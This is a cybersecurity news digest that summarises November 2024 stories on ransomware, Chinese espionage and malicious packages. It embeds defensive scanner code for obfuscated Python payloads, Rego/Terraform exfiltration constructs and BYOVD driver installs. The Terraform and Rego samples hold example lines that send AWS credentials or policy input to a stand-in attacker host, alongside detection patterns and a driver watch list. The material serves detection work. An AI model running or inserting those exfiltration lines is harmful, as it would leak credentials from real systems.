Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12820
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-11-26 05:04:17 | thehackernews | NATION STATE ACTIVITY | Urgent CISA Alert on Cyber Espionage Exploiting Array Networks Flaw | The Cybersecurity and Infrastructure Security Agency (CISA) has added a critical, actively exploited flaw in Array Networks AG Series and vxAG secure access gateways to its Known Exploited Vulnerabilities catalog.
The vulnerability (CVE-2023-28461, CVSS 9.8) stems from missing authentication: an unauthenticated remote attacker can browse the gateway's filesystem and execute arbitrary code.
Array Networks fixed the issue in firmware 9.4.0.484; releases 9.4.0.481 and earlier remain affected.
Trend Micro attributes the exploitation to Earth Kasha (also tracked as MirrorFace), a China-linked group that has targeted entities in Japan, Taiwan, India, and Europe.
Earth Kasha's recent campaigns have also reached European diplomatic entities, where the group deployed backdoors.
U.S. federal civilian agencies are required to apply the fix by December 16, 2024.
More than 440,000 internet-exposed hosts worldwide are reported as potentially affected, underscoring the need for asset inventory and prompt patch management. | Details |
| 2024-11-26 01:32:23 | theregister | CYBERCRIME | Ransomware Disruption Impacts Blue Yonder and UK Retailers | Blue Yonder, an Arizona-based supply chain SaaS vendor owned by Panasonic, suffered a ransomware attack on November 21 that caused significant disruption to its hosted services.
The attack has directly affected the supply chain operations of major UK retailers like Morrisons and Sainsbury's, leading to difficulties in stocking shelves.
Post-attack, Blue Yonder has been actively working with external cybersecurity experts to restore services and implement defensive measures.
Affected systems include payroll and staff scheduling; Starbucks said the outage disrupted its barista scheduling and pay processes, although stores stayed open and sales continued.
Morrisons and Sainsbury’s have implemented alternative processes to manage their supply chains amid ongoing disruptions.
Blue Yonder says it is working to keep the impact on its US-based clients minimal.
The overall situation remains fluid with no clear recovery timeline, as continuous efforts are made to secure and reinstate full operations.
The incident underscores the broader implications of cyber-attacks on essential service infrastructures and the ripple effect on dependent businesses and services. | Details |
| 2024-11-25 22:15:38 | bleepingcomputer | CYBERCRIME | QNAP Issues Fixes for Critical Vulnerabilities in Devices | QNAP released security updates addressing multiple vulnerabilities in its NAS and router software, including three critical severity issues.
Critical flaws were patched in Notes Station 3 and QuRouter; the most severe, CVE-2024-48860 (CVSS 9.5), is an OS command injection in QuRouter that lets a remote attacker execute commands on the router.
The addressed vulnerabilities in Notes Station 3 are resolved in version 3.9.7, with users urged to update immediately.
The QuRouter critical flaw, allowing remote command execution, was fixed in version 2.4.3.106.
Additional fixes cover QNAP AI Core, QuLog Center, QTS, and QuTS hero, with severities ranging from high to critical.
QNAP urged customers to update promptly and to avoid exposing devices directly to the internet, for example by reaching them over a VPN instead. | Details |
| 2024-11-25 21:14:54 | bleepingcomputer | RANSOMWARE | Ransomware Attack Disrupts Blue Yonder's Grocery Supply Chain | Blue Yonder, a Panasonic subsidiary, experienced a significant ransomware attack on November 21, 2024, impacting its supply chain services.
The attack targeted Blue Yonder’s managed services hosting environment, leading to disruptions primarily affecting grocery store chains in the UK.
Blue Yonder's clientele includes major companies such as DHL, Renault, Bayer, Morrisons, Nestlé, 3M, Tesco, Starbucks, Ace Hardware, Procter & Gamble, Sainsbury's, and 7-Eleven.
A spokesperson for UK grocery chain Morrisons confirmed that they reverted to slower backup processes due to the outage.
Sainsbury's had contingency plans that helped mitigate the impact of the disruption.
Blue Yonder and external cybersecurity experts are actively working on recovery strategies; however, no definite timeline for service restoration has been shared.
Updates from Blue Yonder urge clients to stay informed through the customer update page as the situation evolves.
At the time of the last update, no ransomware group had claimed responsibility for the attack. | Details |
| 2024-11-25 19:28:47 | bleepingcomputer | CYBERCRIME | Man Indicted for Hacking to Sell Cybersecurity Services | Nicholas Michael Kloster, 31, from Kansas City, Missouri, has been indicted for hacking into computer networks of a health club and a nonprofit organization.
Kloster allegedly used his unauthorized access to promote his cybersecurity services, claiming he could improve the security of the systems he had compromised.
In one instance, Kloster emailed a gym owner, detailing his unauthorized access, and offered his services to secure their systems.
He reduced his own gym membership fee, removed his photo from the gym's database, and took a staff member's name tag.
Kloster posted evidence of his control over a gym's security system on social media.
He also gained unauthorized access to a nonprofit, installing a VPN and altering account passwords, causing significant remedial costs.
Kloster is further accused of using stolen credit card information to purchase hacking tools.
The DOJ states Kloster could face up to 15 years in prison if convicted for his cybercrimes against multiple organizations. | Details |
| 2024-11-25 19:18:28 | theregister | MISCELLANEOUS | Microsoft Enhances Windows Security Post-CrowdStrike Incident | Microsoft has announced the Windows Resiliency Initiative, drawing on lessons from the July 2024 incident in which a faulty CrowdStrike Falcon sensor content update crashed roughly 8.5 million Windows machines.
The new initiatives include enabling more applications and users to operate without administrative privileges, enforcing stricter controls on permissible apps and drivers, and bolstering identity protection to combat phishing.
To cut reliance on kernel-mode code, which was central to the CrowdStrike outage, Microsoft is building Windows capabilities that let security vendors run their products outside the kernel, in user mode; a private preview for Microsoft Virus Initiative (MVI) partners is planned for July 2025.
A newly announced feature, Quick Machine Recovery, lets administrators push targeted fixes through Windows Update to machines that can no longer boot, without physical access; it is slated for Windows Insider testing in early 2025.
MVI partners have also committed to Safe Deployment Practices for security updates, meaning gradual, monitored rollouts that can be halted before a bad update reaches every customer.
Another upcoming feature, Hotpatch in Windows, will enable critical security updates to be done without the need for system restarts, enhancing security management efficiency.
Despite these advancements, some industry professionals believe these security improvements by Microsoft are overdue, highlighting past incidents that have exposed significant architectural weaknesses in Windows security management. | Details |
| 2024-11-25 16:16:45 | bleepingcomputer | NATION STATE ACTIVITY | Salt Typhoon Uses GhostSpider to Infiltrate Global Telecoms | Chinese state-sponsored group Salt Typhoon utilized a new malware, GhostSpider, targeting telecommunication providers globally.
GhostSpider, documented by Trend Micro, is a multi-modular backdoor built for stealth and long-term espionage, with its modules loaded and run only in memory.
Salt Typhoon is reported to have compromised multiple U.S. telecom firms, including Verizon, AT&T, and T-Mobile, gaining access to sensitive government communications.
U.S. authorities have recently informed 150 victims about breaches linked to Salt Typhoon's activities.
The group also employs Masol RAT, Demodex, and SnappyBee backdoors for their cyber operations across various sectors including government, technology, and transportation.
Notable campaigns include 'Alpha' targeting Taiwanese government and chemical industries, and 'Beta' focusing on Southeast Asian telecoms.
Initial access comes from exploiting known vulnerabilities in public-facing devices, with Trend Micro citing flaws in Ivanti Connect Secure, Fortinet FortiClient EMS, Sophos Firewall, and Microsoft Exchange (ProxyLogon), followed by lateral movement deeper into the networks.
Trend Micro emphasizes the sophistication of Salt Typhoon and recommends robust, multi-layered cybersecurity defenses to protect against such threats. | Details |
| 2024-11-25 14:25:38 | thehackernews | MISCELLANEOUS | Google Introduces Restore Credentials Feature for Android | Google has launched a new feature named Restore Credentials to ease user transition to new Android devices by securely restoring third-party app logins.
The feature is integrated into Android’s Credential Manager API, eliminating the need to re-enter app login details manually during device migration.
Restore Credentials works through a restore key, a public-key credential built on the same FIDO2 standard as passkeys, which lets an app re-authenticate the user in the background without a login prompt.
The restore keys are stored locally and can be encrypted and saved to the cloud if the user has enabled cloud backup.
Transitioning to a new device prompts the system to request restore keys from the cloud or local storage, automatically signing the user into their apps.
Google advises app developers to generate a restore key post-user authentication and to delete it when the user signs out to prevent repetitive automatic log-ins.
iOS offers comparable behaviour through iCloud Keychain, where the kSecAttrAccessible attribute on a Keychain item controls whether it can be synced or restored; the *ThisDeviceOnly accessibility values pin a credential to a single device.
The announcement coincides with Google's release of the first Developer Preview of Android 16, demonstrating ongoing improvements in Android privacy and security features. | Details |
| 2024-11-25 13:55:11 | thehackernews | MALWARE | Malicious Python Package 'aiocpa' Compromises Crypto Keys | A malicious update to the Python library "aiocpa" was published to PyPI, designed to exfiltrate the victim's Crypto Pay API tokens via a Telegram bot.
Although the package was originally released in September 2024, signs of malicious activity surfaced in version 0.1.13.
This version altered the "sync.py" script to decode and execute a highly obfuscated code after installation.
The malicious code specifically captures the victim's Crypto Pay API token and transmits it using a Telegram bot.
PyPI has placed the "aiocpa" package in quarantine to prevent further downloads and modifications.
The library's GitHub repository remained clean while the PyPI release carried the payload, a mismatch between published artifact and source that suggests an effort to evade review.
It remains unclear whether the original developer published the malicious version deliberately or whether their PyPI credentials were stolen.
The incident shows why the published artifact, not just the source repository, needs to be inspected before installation: attackers rely on the trust a package earned while it was still benign. | Details |
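The aiocpa payload is described above as a blob of obfuscated code that "sync.py" decodes and executes after installation. The check below, added here as an illustration and not Phylum's or PyPI's tooling, shows how a practitioner can catch that pattern statically in a downloaded artifact: it parses the source with `ast`, flags `exec`/`eval`/`compile` calls whose argument is built from a decoder (`base64.b64decode`, `zlib.decompress`, and so on), and separately flags long string constants whose entropy is too high to be prose or identifiers. The two sample modules are constructed for this example; the base64 blob is an arbitrary byte sequence standing in for an obfuscated payload and is never executed.

```python
"""Static check for the decode-then-execute pattern in a Python package.

Added example, not the real aiocpa code. Nothing here imports or runs the
scanned source; it is parsed only.
"""
import ast
import base64
import math
from collections import Counter
from typing import List, Optional, Tuple

# Builtins that turn data into running code.
EXEC_SINKS = {"exec", "eval", "compile"}

# Functions whose result is typically a decoded or decompressed payload.
DECODERS = {
    "b64decode", "b32decode", "b16decode", "a85decode", "b85decode",
    "decompress", "unhexlify", "fromhex", "decode",
}


def _callee_name(call: ast.Call) -> Optional[str]:
    """exec(...) -> 'exec'; base64.b64decode(...) -> 'b64decode'."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def _contains_decoder(node: ast.AST) -> bool:
    return any(
        isinstance(sub, ast.Call) and _callee_name(sub) in DECODERS
        for sub in ast.walk(node)
    )


def find_decoded_exec(source: str) -> List[int]:
    """Line numbers of exec/eval/compile calls fed by a decoder call,
    e.g. exec(zlib.decompress(base64.b64decode(blob)))."""
    tree = ast.parse(source)
    return sorted(
        node.lineno
        for node in ast.walk(tree)
        if isinstance(node, ast.Call)
        and _callee_name(node) in EXEC_SINKS
        and any(_contains_decoder(arg) for arg in node.args)
    )


def shannon_entropy(text: str) -> float:
    """Bits per character: English prose sits near 4, base64 of compressed
    or encrypted data approaches 6."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def high_entropy_strings(source: str, min_len: int = 40,
                         min_bits: float = 4.8) -> List[Tuple[int, int, float]]:
    """(line, length, entropy) for string constants that look like packed data."""
    tree = ast.parse(source)
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and len(node.value) >= min_len:
            bits = shannon_entropy(node.value)
            if bits >= min_bits:
                hits.append((node.lineno, len(node.value), round(bits, 2)))
    return hits


# Constructed samples. BLOB is base64 of the bytes 0..255: opaque and high
# entropy, and harmless because nothing here decodes or runs it.
BLOB = base64.b64encode(bytes(range(256))).decode()

SUSPICIOUS_SOURCE = f'''
import base64
import zlib


def sync():
    # looks like an innocent helper, but unpacks and runs hidden code
    exec(zlib.decompress(base64.b64decode("{BLOB}")))
'''

CLEAN_SOURCE = '''
import base64


def encode_token(token: bytes) -> str:
    """Encode a token for transport."""
    return base64.b64encode(token).decode()
'''


def report(source: str) -> dict:
    return {
        "decoded_exec_lines": find_decoded_exec(source),
        "packed_strings": high_entropy_strings(source),
    }


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SOURCE), ("clean", CLEAN_SOURCE)):
        print(label, report(src))
```

Run `report()` over every `.py` file in the sdist or wheel actually fetched from PyPI, not over a `git clone` of the project: the point of the aiocpa case is that the two can differ. A clean decoder call on its own (as in the clean sample) is normal; a decoder feeding `exec` is not.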
| 2024-11-25 13:19:40 | theregister | NATION STATE ACTIVITY | China's Extensive Cyber-Attacks on US Telcos Force Rebuilds | Senator Mark R. Warner highlighted extensive cyber-attacks by Chinese operatives on US telecommunications systems, describing the situation as severe.
The attacks on US telcos required potentially massive hardware replacements, including "thousands" of switches and routers.
Warner described the intrusion as far worse than earlier major incidents such as the SolarWinds supply chain compromise and the Colonial Pipeline ransomware attack.
Warner revealed these cyber-attacks had allowed for persistent access to US telco networks, suggesting that significant espionage and data theft could have occurred, including eavesdropping on calls.
The ongoing vulnerability of US telecom infrastructure was emphasized, with Warner noting "The barn door is still wide open, or mostly open."
The Biden administration convened a meeting with telecom executives to discuss these revelations and coordinate responses to the ongoing threats.
The FBI and the US Cybersecurity and Infrastructure Security Agency had previously warned about the Beijing-backed hacking group, dubbed Salt Typhoon, involved in these operations.
China denies these accusations, claiming the US fabricates such claims, yet offers no alternate explanations. | Details |
| 2024-11-25 11:33:36 | thehackernews | CYBERCRIME | Evolution and Tactics of Modern Phishing Techniques | Phishing techniques have become increasingly sophisticated, evolving from simple scams to complex operations that bypass modern security measures.
Attackers validate stolen card numbers with the Luhn checksum and confirm they are live with small test charges or micro-donations before using or selling them.
Modern phishing includes evasion tactics like randomizing URL folder structures and employing VMs that mirror victims' device profiles, complicating detection and tracking by defenders.
Attackers adapt to security research methods by blocking an IP address after a single visit and detecting proxies, so that a kit appears to have been taken down to anyone who returns to inspect it.
Phishing attacks now exploit device information to bypass security protocols like device ID verification, posing significant challenges to organizational cybersecurity.
Innovative redirection techniques in phishing scams involve multiple URL changes and use of decentralized web services to avoid traceability and hinder cybersecurity efforts.
Cybercriminals continue to refine their evasion strategies, including using encoded scripts and exploiting legitimate web functionalities to mislead targets and researchers.
Defenders are encouraged to persistently update their tactics and adapt to the evolving strategies of these sophisticated cyber adversaries, highlighting the ongoing cybersecurity battle. | Details |
| 2024-11-25 11:28:17 | thehackernews | CYBERCRIME | Security Flaws in Terraform and OPA Facilitate Cloud Data Breaches | Tenable researchers described new attacks targeting Infrastructure-as-Code (IaC) and Policy-as-Code (PaC) tools, specifically Terraform and Open Policy Agent (OPA).
Attackers can insert malicious policies or configurations into these tools to exfiltrate sensitive data from cloud platforms.
OPA’s Rego language allows policy enforcement across cloud environments, but attackers can misuse functions like "http.send" or "net.lookup_ip_addr" for data exfiltration.
Terraform is exposed because "terraform plan", which CI/CD pipelines typically run automatically on pull requests, evaluates data sources and providers, so a malicious configuration can execute code on the runner before any human reviews the change.
Tenable advises restricting risky functions and monitoring policies in OPA along with careful review of pull requests in Terraform’s GitHub workflows.
Recommended preventative measures include the use of IaC scanning tools such as Terrascan and Checkov to identify misconfigurations before deployment.
These vulnerabilities highlight the importance of only using trusted third-party resources and maintaining strong security oversight on policy and code configuration tools. | Details |
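The Rego builtins named above ("http.send", "net.lookup_ip_addr") and the plan-time code execution in Terraform are both things a pipeline can screen for before a policy or configuration is merged. The scanner below is an added example for this brief, not Tenable's tooling. It flags calls to exfiltration-capable OPA builtins in Rego (skipping comments, so a mention in a comment is not a hit) and flags the Terraform "external" data source, which runs its program during "terraform plan", and the "local-exec" provisioner, which runs during "terraform apply". The policy and configuration text is constructed for illustration; attacker.invalid is a reserved name that never resolves.

```python
"""Lint Rego policies and Terraform configs for constructs that can move data
or run code on the CI runner. Added example, not Tenable's tooling."""
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    line: int        # 1-based line in the scanned text
    construct: str   # builtin or block that matched
    reason: str


# Real OPA builtins. opa.runtime() is included because it exposes OPA's
# environment variables and config, which is usually what an attacker wants
# to send through http.send or a DNS lookup.
RISKY_REGO_BUILTINS = {
    "http.send": "policy can make outbound HTTP requests (direct exfiltration channel)",
    "net.lookup_ip_addr": "policy can issue DNS queries (DNS-based exfiltration channel)",
    "opa.runtime": "policy can read OPA's environment variables and configuration",
}

# Each pattern matches the opening line of a Terraform block.
RISKY_TF_BLOCKS = [
    (re.compile(r'^\s*data\s+"external"\s+"[^"]+"\s*\{'),
     "external", "data source executes an arbitrary program at plan time"),
    (re.compile(r'^\s*provisioner\s+"local-exec"\s*\{'),
     "local-exec", "provisioner executes a shell command on the runner at apply time"),
]


def _is_comment(line: str) -> bool:
    s = line.lstrip()
    return s.startswith("#") or s.startswith("//")


def scan_rego(text: str) -> List[Finding]:
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        if _is_comment(line):
            continue
        for name, reason in RISKY_REGO_BUILTINS.items():
            # A call to the builtin itself, not a longer dotted name ending in it.
            if re.search(r"(?<![\w.])" + re.escape(name) + r"\s*\(", line):
                findings.append(Finding(n, name, reason))
    return findings


def scan_terraform(text: str) -> List[Finding]:
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        if _is_comment(line):
            continue
        for pattern, name, reason in RISKY_TF_BLOCKS:
            if pattern.search(line):
                findings.append(Finding(n, name, reason))
    return findings


# Constructed samples.
MALICIOUS_REGO = '''package terraform.analysis

import rego.v1

# Looks like a tagging check, but posts the whole plan to an outside host.
deny contains msg if {
    some rc in input.resource_changes
    rc.type == "aws_s3_bucket"
    http.send({"method": "POST", "url": "https://attacker.invalid/collect", "body": input})
    msg := "bucket change recorded"
}
'''

CLEAN_REGO = '''package terraform.analysis

import rego.v1

# http.send appears here only in a comment, so it must not be flagged.
deny contains msg if {
    some rc in input.resource_changes
    rc.type == "aws_s3_bucket"
    not rc.change.after.tags.owner
    msg := sprintf("%s has no owner tag", [rc.address])
}
'''

MALICIOUS_TF = '''# This "data source" runs at plan time in CI and ships credentials out.
data "external" "leak" {
  program = ["sh", "-c", "curl -s -d @$HOME/.aws/credentials https://attacker.invalid/"]
}

resource "aws_s3_bucket" "logs" {
  bucket = "example-logs"
}
'''


if __name__ == "__main__":
    for label, text, scan in (("malicious rego", MALICIOUS_REGO, scan_rego),
                              ("clean rego", CLEAN_REGO, scan_rego),
                              ("malicious tf", MALICIOUS_TF, scan_terraform)):
        for f in scan(text):
            print(f"{label}: line {f.line}: {f.construct}: {f.reason}")
```

A text scan like this is a review aid, not the control itself. For OPA the stronger measure is a capabilities file passed with `--capabilities` to `opa check`, `opa eval` or `opa build` that omits `http.send` and the `net.*` lookups, so a policy using them fails to load at all; for Terraform, restrict which providers a pipeline may download and require review before plan runs on changes from untrusted branches.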
| 2024-11-25 11:17:58 | thehackernews | NATION STATE ACTIVITY | New Cyber Espionage Tactics Target Telecoms Worldwide | Liminal Panda, a China-nexus cyber espionage group, has been conducting targeted attacks on telecom entities in South Asia and Africa since 2020.
The group employs custom tools such as SIGTRANslator and CordScan to abuse telecommunications protocols (SIGTRAN signalling and GPRS tunnelling) and harvest mobile subscriber information, call metadata, and SMS messages.
Concurrently, another Chinese-affiliated hacking group, Salt Typhoon, has targeted major U.S. telecom providers like AT&T, Verizon, and T-Mobile, aiming to infiltrate U.S. critical infrastructure.
U.S. Cyber Command indicates these attacks may be preparations for significant geopolitical conflicts, highlighting the strategic importance of telecommunications networks.
Recent disclosed CVEs reveal a broad array of critical vulnerabilities across various platforms and software, underscoring ongoing security risks in both commercial and personal technology environments.
The technique of DNS sinkholing is highlighted as an effective cybersecurity tool, offering a proactive method to intercept and neutralize threats before they impact systems.
The overall synthesis of the week's news points to the increasing complexity and stakes of global cybersecurity, emphasizing the necessity for vigilance and proactive defense strategies in digital infrastructures. | Details |
| 2024-11-25 09:16:41 | thehackernews | MALWARE | New Malware Campaign Exploits Avast Driver to Disable Security | Cybersecurity researchers have identified a new malware that utilizes the Bring Your Own Vulnerable Driver (BYOVD) technique to circumvent antivirus protections.
The malware drops a legitimate, digitally signed Avast Anti-Rootkit driver (aswArPot.sys) that contains a known weakness; the driver itself is unmodified, which is what keeps its signature valid and allows it to load.
Launched via an executable named kill-floor.exe, the malware registers the driver as a service, giving it a kernel-mode component it can command from user mode.
Once the driver is loaded, the malware compares running processes against a hard-coded list of 142 names, many belonging to security software, and has the driver terminate any match.
Because the termination happens in kernel mode, it bypasses the tamper protections that antivirus and Endpoint Detection and Response (EDR) products can only enforce against other user-mode processes.
Details on how the malware is initially dropped onto systems and the extent of its distribution remain unclear.
The technique of exploiting flawed, signed drivers has been increasingly adopted by attackers, especially in ransomware deployments.
Researchers highlighted a previous incidence in May, involving the GHOSTENGINE malware that also manipulated the Avast driver to disable security processes. | Details |
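The one step in this chain a defender can see early is the driver being registered as a service, which Windows records in the System log as Event ID 7045 ("A service was installed in the system"). The triage routine below is an added example, not Trellix's detection content: it reads 7045 records (the four events are constructed to mimic the event's EventData fields, ServiceName, ImagePath, ServiceType and StartType, as exported to JSON) and alerts when a kernel driver service points at a driver file name known to be abused, or at a driver image outside the Windows drivers directory. The only name on the watch list is aswArPot.sys from this report; a production list would be fed from the Microsoft vulnerable-driver blocklist or the LOLDrivers project. The renamed-copy event is constructed to show why a file-name list alone is not enough.

```python
"""Triage Windows Event ID 7045 records for BYOVD-style driver installs.
Added example, not a vendor detection rule. Sample events are constructed."""
import re
from typing import Dict, List

# Driver file names known to be abused (from this report only).
KNOWN_ABUSED_DRIVERS = {"aswarpot.sys"}

# Legitimate kernel drivers almost always live here.
TRUSTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\",)


def normalize_image_path(raw: str) -> str:
    """Lower-case, strip NT path prefixes and quotes, expand %SystemRoot%,
    and root paths that 7045 reports relative to the Windows directory."""
    p = raw.strip().strip('"')
    for prefix in ("\\??\\", "\\\\?\\"):
        if p.startswith(prefix):
            p = p[len(prefix):]
    p = p.lower().replace("%systemroot%", "c:\\windows")
    if not re.match(r"^[a-z]:\\", p):
        p = "c:\\windows\\" + p.lstrip("\\")
    return p


def triage_service_install(event: Dict[str, object]) -> List[str]:
    """Reasons the event is suspicious; an empty list means ignore it."""
    reasons: List[str] = []
    if str(event.get("EventID")) != "7045":
        return reasons
    # BYOVD needs a kernel driver; user-mode services are out of scope here.
    if "kernel" not in str(event.get("ServiceType", "")).lower():
        return reasons

    path = normalize_image_path(str(event.get("ImagePath", "")))
    name = path.rsplit("\\", 1)[-1]

    if name in KNOWN_ABUSED_DRIVERS:
        reasons.append(f"known abused driver {name} registered as service "
                       f"{event.get('ServiceName')!r}")
    if not path.startswith(TRUSTED_DRIVER_DIRS):
        reasons.append(f"kernel driver image outside the drivers directory: {path}")
    return reasons


# Constructed 7045 records.
SAMPLE_EVENTS = [
    {   # the report's pattern: the Avast driver registered from a user-writable path
        "EventID": 7045, "ServiceName": "aswArPot.sys",
        "ImagePath": "\\??\\C:\\Users\\Public\\aswArPot.sys",
        "ServiceType": "kernel mode driver", "StartType": "demand start",
    },
    {   # a normal Defender driver install
        "EventID": 7045, "ServiceName": "WdFilter",
        "ImagePath": "system32\\DRIVERS\\WdFilter.sys",
        "ServiceType": "kernel mode driver", "StartType": "boot start",
    },
    {   # user-mode service from an odd path: worth a look, but not BYOVD
        "EventID": 7045, "ServiceName": "UpdaterSvc",
        "ImagePath": "C:\\Users\\Public\\updater.exe",
        "ServiceType": "user mode service", "StartType": "auto start",
    },
    {   # same driver renamed before registration: only the path check fires
        "EventID": 7045, "ServiceName": "aswArPot.sys",
        "ImagePath": "\\??\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\ntfs.bin",
        "ServiceType": "kernel mode driver", "StartType": "demand start",
    },
]


def triage_all(events: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """ServiceName -> reasons, for every event that produced at least one."""
    out: Dict[str, List[str]] = {}
    for ev in events:
        reasons = triage_service_install(ev)
        if reasons:
            out.setdefault(str(ev.get("ServiceName")), []).extend(reasons)
    return out


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["ServiceName"], "->", triage_service_install(ev) or "ok")
```

In practice the file name is the weakest signal, since the malware can drop the driver under any name; hashes and Authenticode signer details from Sysmon Event ID 6 (driver loaded) are the fields to match against a blocklist. The preventive counterpart is Microsoft's vulnerable driver blocklist enforced through HVCI or a WDAC policy, which stops a blocklisted driver from loading at all regardless of how the service was registered.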
| 2024-11-25 06:35:11 | theregister | NATION STATE ACTIVITY | Google Blocks Over 1000 Pro-China Fake News Websites | Google's Threat Intelligence Group has identified and blocked over 1,000 websites linked to a network dubbed "Glassbridge," involved in spreading pro-China narratives.
The network comprises four digital PR firms, Shanghai Haixun Technology among them, that publish thematically similar pro-PRC content across their networks of sites.
These domains posed as independent news outlets but were actually pushing content that aligns with the political interests of the People’s Republic of China.
The content ranged from state-sponsored media and press releases to conspiracy theories and attacks on individuals, often mixed with more innocuous material.
Digital PR firms linked to these operations provided a veneer of legitimacy, helping obscure the origins and coordination behind the content dissemination.
Google's actions include removing these sites from Google News and Google Discover and terminating associated YouTube channels.
Mandiant, a cybersecurity firm, had already flagged some of these domains in 2022 for similar deceptive practices.
The shift from purely social media-based information operations to including newswires and fake news sites mirrors tactics seen in Russian and Iranian influence campaigns. | Details |